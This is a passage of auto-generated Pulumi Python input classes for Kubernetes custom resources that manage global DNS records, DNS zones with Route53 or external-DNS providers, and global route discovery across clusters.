ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
@pulumi.input_type
class GlobalDNSRecordStatusMonitoredServiceStatusesArgs:
def __init__(__self__, *,
status: pulumi.Input[str],
type: pulumi.Input[str],
last_transition_time: Optional[pulumi.Input[str]] = None,
message: Optional[pulumi.Input[str]] = None,
reason: Optional[pulumi.Input[str]] = None):
"""
Condition represents an observation of an object's state. Conditions are an extension mechanism intended to be used when the details of an observation are not a priori known or would not apply to all instances of a given Kind.
Conditions should be added to explicitly convey properties that users and components care about rather than requiring those properties to be inferred from other observations. Once defined, the meaning of a Condition can not be changed arbitrarily - it becomes part of the API, and has the same backwards- and forwards-compatibility concerns of any other part of the API.
:param pulumi.Input[str] type: ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
:param pulumi.Input[str] reason: ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
pulumi.set(__self__, "status", status)
pulumi.set(__self__, "type", type)
if last_transition_time is not None:
pulumi.set(__self__, "last_transition_time", last_transition_time)
if message is not None:
pulumi.set(__self__, "message", message)
if reason is not None:
pulumi.set(__self__, "reason", reason)
@property
@pulumi.getter
def status(self) -> pulumi.Input[str]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: pulumi.Input[str]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="lastTransitionTime")
def last_transition_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "last_transition_time")
@last_transition_time.setter
def last_transition_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_transition_time", value)
@property
@pulumi.getter
def message(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "message")
@message.setter
def message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message", value)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
"""
ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
@pulumi.input_type
class GlobalDNSRecordStatusProviderStatusArgs:
def __init__(__self__, *,
route53: Optional[pulumi.Input['GlobalDNSRecordStatusProviderStatusRoute53Args']] = None):
"""
ProviderStatus contains provider specific status information
"""
if route53 is not None:
pulumi.set(__self__, "route53", route53)
@property
@pulumi.getter
def route53(self) -> Optional[pulumi.Input['GlobalDNSRecordStatusProviderStatusRoute53Args']]:
return pulumi.get(self, "route53")
@route53.setter
def route53(self, value: Optional[pulumi.Input['GlobalDNSRecordStatusProviderStatusRoute53Args']]):
pulumi.set(self, "route53", value)
@pulumi.input_type
class GlobalDNSRecordStatusProviderStatusRoute53Args:
def __init__(__self__, *,
health_check_id: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
policy_id: Optional[pulumi.Input[str]] = None,
policy_instance_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] health_check_id: HealthCheckID represents the route53 healthcheck created for this record
:param pulumi.Input[str] policy_id: PolicyID represents the route53 routing policy created for this record
:param pulumi.Input[str] policy_instance_id: PolicyInstanceID represents the ID of the DNSRecord
"""
if health_check_id is not None:
pulumi.set(__self__, "health_check_id", health_check_id)
if policy_id is not None:
pulumi.set(__self__, "policy_id", policy_id)
if policy_instance_id is not None:
pulumi.set(__self__, "policy_instance_id", policy_instance_id)
@property
@pulumi.getter(name="healthCheckID")
def health_check_id(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
HealthCheckID represents the route53 healthcheck created for this record
"""
return pulumi.get(self, "health_check_id")
@health_check_id.setter
def health_check_id(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "health_check_id", value)
@property
@pulumi.getter(name="policyID")
def policy_id(self) -> Optional[pulumi.Input[str]]:
"""
PolicyID represents the route53 routing policy created for this record
"""
return pulumi.get(self, "policy_id")
@policy_id.setter
def policy_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "policy_id", value)
@property
@pulumi.getter(name="policyInstanceID")
def policy_instance_id(self) -> Optional[pulumi.Input[str]]:
"""
PolicyInstanceID represents the ID of the DNSRecord
"""
return pulumi.get(self, "policy_instance_id")
@policy_instance_id.setter
def policy_instance_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "policy_instance_id", value)
@pulumi.input_type
class GlobalDNSZoneSpecArgs:
def __init__(__self__, *,
domain: pulumi.Input[str],
provider: pulumi.Input['GlobalDNSZoneSpecProviderArgs']):
"""
GlobalDNSZoneSpec defines the desired state of GlobalDNSZone
:param pulumi.Input['GlobalDNSZoneSpecProviderArgs'] provider: ProviderConfig configures kind and access to the DNS Zone. Exactly one of its members must be set.
"""
pulumi.set(__self__, "domain", domain)
pulumi.set(__self__, "provider", provider)
@property
@pulumi.getter
def domain(self) -> pulumi.Input[str]:
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: pulumi.Input[str]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter
def provider(self) -> pulumi.Input['GlobalDNSZoneSpecProviderArgs']:
"""
ProviderConfig configures kind and access to the DNS Zone. Exactly one of its members must be set.
"""
return pulumi.get(self, "provider")
@provider.setter
def provider(self, value: pulumi.Input['GlobalDNSZoneSpecProviderArgs']):
pulumi.set(self, "provider", value)
@pulumi.input_type
class GlobalDNSZoneSpecProviderArgs:
def __init__(__self__, *,
external_dns: Optional[pulumi.Input['GlobalDNSZoneSpecProviderExternalDNSArgs']] = None,
route53: Optional[pulumi.Input['GlobalDNSZoneSpecProviderRoute53Args']] = None):
"""
ProviderConfig configures kind and access to the DNS Zone. Exactly one of its members must be set.
:param pulumi.Input['GlobalDNSZoneSpecProviderExternalDNSArgs'] external_dns: ExternalDNSProviderConfig contains configuration on how configure the external DNS provider
:param pulumi.Input['GlobalDNSZoneSpecProviderRoute53Args'] route53: Route53ProviderConfig contains configuration on how to access the route53 API
"""
if external_dns is not None:
pulumi.set(__self__, "external_dns", external_dns)
if route53 is not None:
pulumi.set(__self__, "route53", route53)
@property
@pulumi.getter(name="externalDNS")
def external_dns(self) -> Optional[pulumi.Input['GlobalDNSZoneSpecProviderExternalDNSArgs']]:
"""
ExternalDNSProviderConfig contains configuration on how configure the external DNS provider
"""
return pulumi.get(self, "external_dns")
@external_dns.setter
def external_dns(self, value: Optional[pulumi.Input['GlobalDNSZoneSpecProviderExternalDNSArgs']]):
pulumi.set(self, "external_dns", value)
@property
@pulumi.getter
def route53(self) -> Optional[pulumi.Input['GlobalDNSZoneSpecProviderRoute53Args']]:
"""
Route53ProviderConfig contains configuration on how to access the route53 API
"""
return pulumi.get(self, "route53")
@route53.setter
def route53(self, value: Optional[pulumi.Input['GlobalDNSZoneSpecProviderRoute53Args']]):
pulumi.set(self, "route53", value)
@pulumi.input_type
class GlobalDNSZoneSpecProviderExternalDNSArgs:
def __init__(__self__, *,
annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
ExternalDNSProviderConfig contains configuration on how configure the external DNS provider
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] annotations: Annotations is a map of annotations to be added to the created DNSEndpoint records.
"""
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Annotations is a map of annotations to be added to the created DNSEndpoint records.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "annotations", value)
@pulumi.input_type
class GlobalDNSZoneSpecProviderRoute53Args:
def __init__(__self__, *,
credentials_secret_ref: pulumi.Input['GlobalDNSZoneSpecProviderRoute53CredentialsSecretRefArgs'],
zone_id: pulumi.Input[str]):
"""
Route53ProviderConfig contains configuration on how to access the route53 API
:param pulumi.Input['GlobalDNSZoneSpecProviderRoute53CredentialsSecretRefArgs'] credentials_secret_ref: CredentialsSecretRef is a reference to a secret containing the credentials to access the AWS API //TODO (content and needed permissions) expected secret keys are "aws_access_key_id" and "aws_secret_access_key"
:param pulumi.Input[str] zone_id: ZoneID is the AWS route53 zone ID.
"""
pulumi.set(__self__, "credentials_secret_ref", credentials_secret_ref)
pulumi.set(__self__, "zone_id", zone_id)
@property
@pulumi.getter(name="credentialsSecretRef")
def credentials_secret_ref(self) -> pulumi.Input['GlobalDNSZoneSpecProviderRoute53CredentialsSecretRefArgs']:
"""
CredentialsSecretRef is a reference to a secret containing the credentials to access the AWS API //TODO (content and needed permissions) expected secret keys are "aws_access_key_id" and "aws_secret_access_key"
"""
return pulumi.get(self, "credentials_secret_ref")
@credentials_secret_ref.setter
def credentials_secret_ref(self, value: pulumi.Input['GlobalDNSZoneSpecProviderRoute53CredentialsSecretRefArgs']):
pulumi.set(self, "credentials_secret_ref", value)
@property
@pulumi.getter(name="zoneID")
def zone_id(self) -> pulumi.Input[str]:
"""
ZoneID is the AWS route53 zone ID.
"""
return pulumi.get(self, "zone_id")
@zone_id.setter
def zone_id(self, value: pulumi.Input[str]):
pulumi.set(self, "zone_id", value)
@pulumi.input_type
class GlobalDNSZoneSpecProviderRoute53CredentialsSecretRefArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
namespace: pulumi.Input[str]):
"""
CredentialsSecretRef is a reference to a secret containing the credentials to access the AWS API //TODO (content and needed permissions) expected secret keys are "aws_access_key_id" and "aws_secret_access_key"
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "namespace", namespace)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@pulumi.input_type
class GlobalDNSZoneStatusArgs:
def __init__(__self__, *,
conditions: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSZoneStatusConditionsArgs']]]] = None):
"""
GlobalDNSZoneStatus defines the observed state of GlobalDNSZone
:param pulumi.Input[Sequence[pulumi.Input['GlobalDNSZoneStatusConditionsArgs']]] conditions: INSERT ADDITIONAL STATUS FIELD - define observed state of cluster Important: Run "operator-sdk generate k8s" to regenerate code after modifying this file Add custom validation using kubebuilder tags: https://book-v1.book.kubebuilder.io/beyond_basics/generating_crd.html
"""
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSZoneStatusConditionsArgs']]]]:
"""
INSERT ADDITIONAL STATUS FIELD - define observed state of cluster Important: Run "operator-sdk generate k8s" to regenerate code after modifying this file Add custom validation using kubebuilder tags: https://book-v1.book.kubebuilder.io/beyond_basics/generating_crd.html
"""
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSZoneStatusConditionsArgs']]]]):
pulumi.set(self, "conditions", value)
@pulumi.input_type
class GlobalDNSZoneStatusConditionsArgs:
def __init__(__self__, *,
status: pulumi.Input[str],
type: pulumi.Input[str],
last_transition_time: Optional[pulumi.Input[str]] = None,
message: Optional[pulumi.Input[str]] = None,
reason: Optional[pulumi.Input[str]] = None):
"""
Condition represents an observation of an object's state. Conditions are an extension mechanism intended to be used when the details of an observation are not a priori known or would not apply to all instances of a given Kind.
Conditions should be added to explicitly convey properties that users and components care about rather than requiring those properties to be inferred from other observations. Once defined, the meaning of a Condition can not be changed arbitrarily - it becomes part of the API, and has the same backwards- and forwards-compatibility concerns of any other part of the API.
:param pulumi.Input[str] type: ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
:param pulumi.Input[str] reason: ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
pulumi.set(__self__, "status", status)
pulumi.set(__self__, "type", type)
if last_transition_time is not None:
pulumi.set(__self__, "last_transition_time", last_transition_time)
if message is not None:
pulumi.set(__self__, "message", message)
if reason is not None:
pulumi.set(__self__, "reason", reason)
@property
@pulumi.getter
def status(self) -> pulumi.Input[str]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: pulumi.Input[str]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="lastTransitionTime")
def last_transition_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "last_transition_time")
@last_transition_time.setter
def last_transition_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_transition_time", value)
@property
@pulumi.getter
def message(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "message")
@message.setter
def message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message", value)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
"""
ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
@pulumi.input_type
class GlobalRouteDiscoverySpecArgs:
def __init__(__self__, *,
global_zone_ref: pulumi.Input['GlobalRouteDiscoverySpecGlobalZoneRefArgs'],
clusters: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoverySpecClustersArgs']]]] = None,
default_load_balancing_policy: Optional[pulumi.Input[str]] = None,
default_ttl: Optional[pulumi.Input[int]] = None,
route_selector: Optional[pulumi.Input['GlobalRouteDiscoverySpecRouteSelectorArgs']] = None):
"""
GlobalRouteDiscoverySpec defines the desired state of GlobalRouteDiscovery
:param pulumi.Input['GlobalRouteDiscoverySpecGlobalZoneRefArgs'] global_zone_ref: GlobalZoneRef represents the global zone that will be used to host this record
:param pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoverySpecClustersArgs']]] clusters: Cluster is an arrays with the list of clusters in which global routes will be discovered
:param pulumi.Input[str] default_load_balancing_policy: DefaultLoadBalancingPolicy defines the load balancing policy to be used by default. This can be overridden with a route annotation TODO which? -kubebuilder:default:="Multivalue"
:param pulumi.Input[int] default_ttl: Dfeault TTL is the TTL for this dns record -kubebuilder:default:60
:param pulumi.Input['GlobalRouteDiscoverySpecRouteSelectorArgs'] route_selector: RouteSelector is the selector that selects the global routes, this allows you to define also local routes.
"""
pulumi.set(__self__, "global_zone_ref", global_zone_ref)
if clusters is not None:
pulumi.set(__self__, "clusters", clusters)
if default_load_balancing_policy is not None:
pulumi.set(__self__, "default_load_balancing_policy", default_load_balancing_policy)
if default_ttl is not None:
pulumi.set(__self__, "default_ttl", default_ttl)
if route_selector is not None:
pulumi.set(__self__, "route_selector", route_selector)
@property
@pulumi.getter(name="globalZoneRef")
def global_zone_ref(self) -> pulumi.Input['GlobalRouteDiscoverySpecGlobalZoneRefArgs']:
"""
GlobalZoneRef represents the global zone that will be used to host this record
"""
return pulumi.get(self, "global_zone_ref")
@global_zone_ref.setter
def global_zone_ref(self, value: pulumi.Input['GlobalRouteDiscoverySpecGlobalZoneRefArgs']):
pulumi.set(self, "global_zone_ref", value)
@property
@pulumi.getter
def clusters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoverySpecClustersArgs']]]]:
"""
Cluster is an arrays with the list of clusters in which global routes will be discovered
"""
return pulumi.get(self, "clusters")
@clusters.setter
def clusters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoverySpecClustersArgs']]]]):
pulumi.set(self, "clusters", value)
@property
@pulumi.getter(name="defaultLoadBalancingPolicy")
def default_load_balancing_policy(self) -> Optional[pulumi.Input[str]]:
"""
DefaultLoadBalancingPolicy defines the load balancing policy to be used by default. This can be overridden with a route annotation TODO which? -kubebuilder:default:="Multivalue"
"""
return pulumi.get(self, "default_load_balancing_policy")
@default_load_balancing_policy.setter
def default_load_balancing_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "default_load_balancing_policy", value)
@property
@pulumi.getter(name="defaultTTL")
def default_ttl(self) -> Optional[pulumi.Input[int]]:
"""
Dfeault TTL is the TTL for this dns record -kubebuilder:default:60
"""
return pulumi.get(self, "default_ttl")
@default_ttl.setter
def default_ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "default_ttl", value)
@property
@pulumi.getter(name="routeSelector")
def route_selector(self) -> Optional[pulumi.Input['GlobalRouteDiscoverySpecRouteSelectorArgs']]:
"""
RouteSelector is the selector that selects the global routes, this allows you to define also local routes.
"""
return pulumi.get(self, "route_selector")
@route_selector.setter
def route_selector(self, value: Optional[pulumi.Input['GlobalRouteDiscoverySpecRouteSelectorArgs']]):
pulumi.set(self, "route_selector", value)
@pulumi.input_type
class GlobalRouteDiscoverySpecClustersArgs:
def __init__(__self__, *,
cluster_credential_ref: pulumi.Input['GlobalRouteDiscoverySpecClustersClusterCredentialRefArgs'],
cluster_name: pulumi.Input[str]):
"""
ClusterReference contains the infomation necessary to connect to a cluster
:param pulumi.Input['GlobalRouteDiscoverySpecClustersClusterCredentialRefArgs'] cluster_credential_ref: CredentialsSecretRef is a reference to a secret containing the credentials to access the cluster a key called "kubeconfig" containing a valid kubeconfig file for connecting to the cluster must exist in this secret.
:param pulumi.Input[str] cluster_name: ClusterName name of the cluster to connect to.
"""
pulumi.set(__self__, "cluster_credential_ref", cluster_credential_ref)
pulumi.set(__self__, "cluster_name", cluster_name)
@property
@pulumi.getter(name="clusterCredentialRef")
def cluster_credential_ref(self) -> pulumi.Input['GlobalRouteDiscoverySpecClustersClusterCredentialRefArgs']:
"""
CredentialsSecretRef is a reference to a secret containing the credentials to access the cluster a key called "kubeconfig" containing a valid kubeconfig file for connecting to the cluster must exist in this secret.
"""
return pulumi.get(self, "cluster_credential_ref")
@cluster_credential_ref.setter
def cluster_credential_ref(self, value: pulumi.Input['GlobalRouteDiscoverySpecClustersClusterCredentialRefArgs']):
pulumi.set(self, "cluster_credential_ref", value)
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> pulumi.Input[str]:
"""
ClusterName name of the cluster to connect to.
"""
return pulumi.get(self, "cluster_name")
@cluster_name.setter
def cluster_name(self, value: pulumi.Input[str]):
pulumi.set(self, "cluster_name", value)
@pulumi.input_type
class GlobalRouteDiscoverySpecClustersClusterCredentialRefArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
namespace: pulumi.Input[str]):
"""
CredentialsSecretRef is a reference to a secret containing the credentials to access the cluster a key called "kubeconfig" containing a valid kubeconfig file for connecting to the cluster must exist in this secret.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "namespace", namespace)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@pulumi.input_type
class GlobalRouteDiscoverySpecGlobalZoneRefArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None):
"""
GlobalZoneRef represents the global zone that will be used to host this record
:param pulumi.Input[str] name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?
"""
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class GlobalRouteDiscoverySpecRouteSelectorArgs:
def __init__(__self__, *,
match_expressions: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoverySpecRouteSelectorMatchExpressionsArgs']]]] = None,
match_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
RouteSelector is the selector that selects the global routes, this allows you to define also local routes.
:param pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoverySpecRouteSelectorMatchExpressionsArgs']]] match_expressions: matchExpressions is a list of label selector requirements. The requirements are ANDed.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] match_labels: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
if match_expressions is not None:
pulumi.set(__self__, "match_expressions", match_expressions)
if match_labels is not None:
pulumi.set(__self__, "match_labels", match_labels)
@property
@pulumi.getter(name="matchExpressions")
def match_expressions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoverySpecRouteSelectorMatchExpressionsArgs']]]]:
"""
matchExpressions is a list of label selector requirements. The requirements are ANDed.
"""
return pulumi.get(self, "match_expressions")
@match_expressions.setter
def match_expressions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoverySpecRouteSelectorMatchExpressionsArgs']]]]):
pulumi.set(self, "match_expressions", value)
@property
@pulumi.getter(name="matchLabels")
def match_labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
return pulumi.get(self, "match_labels")
@match_labels.setter
def match_labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "match_labels", value)
@pulumi.input_type
class GlobalRouteDiscoverySpecRouteSelectorMatchExpressionsArgs:
def __init__(__self__, *,
key: pulumi.Input[str],
operator: pulumi.Input[str],
values: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
:param pulumi.Input[str] key: key is the label key that the selector applies to.
:param pulumi.Input[str] operator: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
:param pulumi.Input[Sequence[pulumi.Input[str]]] values: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "operator", operator)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
key is the label key that the selector applies to.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def operator(self) -> pulumi.Input[str]:
"""
operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
"""
return pulumi.get(self, "operator")
@operator.setter
def operator(self, value: pulumi.Input[str]):
pulumi.set(self, "operator", value)
@property
@pulumi.getter
def values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
return pulumi.get(self, "values")
@values.setter
def values(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "values", value)
@pulumi.input_type
class GlobalRouteDiscoveryStatusArgs:
def __init__(__self__, *,
cluster_reference_statuses: Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoveryStatusClusterReferenceStatusesArgs']]]]]] = None,
conditions: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoveryStatusConditionsArgs']]]] = None):
"""
GlobalRouteDiscoveryStatus defines the observed state of GlobalRouteDiscovery
:param pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoveryStatusClusterReferenceStatusesArgs']]]]] cluster_reference_statuses: ClusterReferenceStatuses contains the status of the cluster refence connections and their latest reconcile.
:param pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoveryStatusConditionsArgs']]] conditions: ReconcileStatus this is the general status of the main reconciler
"""
if cluster_reference_statuses is not None:
pulumi.set(__self__, "cluster_reference_statuses", cluster_reference_statuses)
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
@property
@pulumi.getter(name="clusterReferenceStatuses")
def cluster_reference_statuses(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoveryStatusClusterReferenceStatusesArgs']]]]]]:
"""
ClusterReferenceStatuses contains the status of the cluster refence connections and their latest reconcile.
"""
return pulumi.get(self, "cluster_reference_statuses")
@cluster_reference_statuses.setter
def cluster_reference_statuses(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoveryStatusClusterReferenceStatusesArgs']]]]]]):
pulumi.set(self, "cluster_reference_statuses", value)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoveryStatusConditionsArgs']]]]:
"""
ReconcileStatus this is the general status of the main reconciler
"""
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoveryStatusConditionsArgs']]]]):
pulumi.set(self, "conditions", value)
@pulumi.input_type
class GlobalRouteDiscoveryStatusClusterReferenceStatusesArgs:
def __init__(__self__, *,
status: pulumi.Input[str],
type: pulumi.Input[str],
last_transition_time: Optional[pulumi.Input[str]] = None,
message: Optional[pulumi.Input[str]] = None,
reason: Optional[pulumi.Input[str]] = None):
"""
Condition represents an observation of an object's state. Conditions are an extension mechanism intended to be used when the details of an observation are not a priori known or would not apply to all instances of a given Kind.
Conditions should be added to explicitly convey properties that users and components care about rather than requiring those properties to be inferred from other observations. Once defined, the meaning of a Condition can not be changed arbitrarily - it becomes part of the API, and has the same backwards- and forwards-compatibility concerns of any other part of the API.
:param pulumi.Input[str] type: ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
:param pulumi.Input[str] reason: ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
pulumi.set(__self__, "status", status)
pulumi.set(__self__, "type", type)
if last_transition_time is not None:
pulumi.set(__self__, "last_transition_time", last_transition_time)
if message is not None:
pulumi.set(__self__, "message", message)
if reason is not None:
pulumi.set(__self__, "reason", reason)
@property
@pulumi.getter
def status(self) -> pulumi.Input[str]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: pulumi.Input[str]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="lastTransitionTime")
def last_transition_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "last_transition_time")
@last_transition_time.setter
def last_transition_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_transition_time", value)
@property
@pulumi.getter
def message(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "message")
@message.setter
def message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message", value)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
"""
ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
@pulumi.input_type
class GlobalRouteDiscoveryStatusConditionsArgs:
def __init__(__self__, *,
status: pulumi.Input[str],
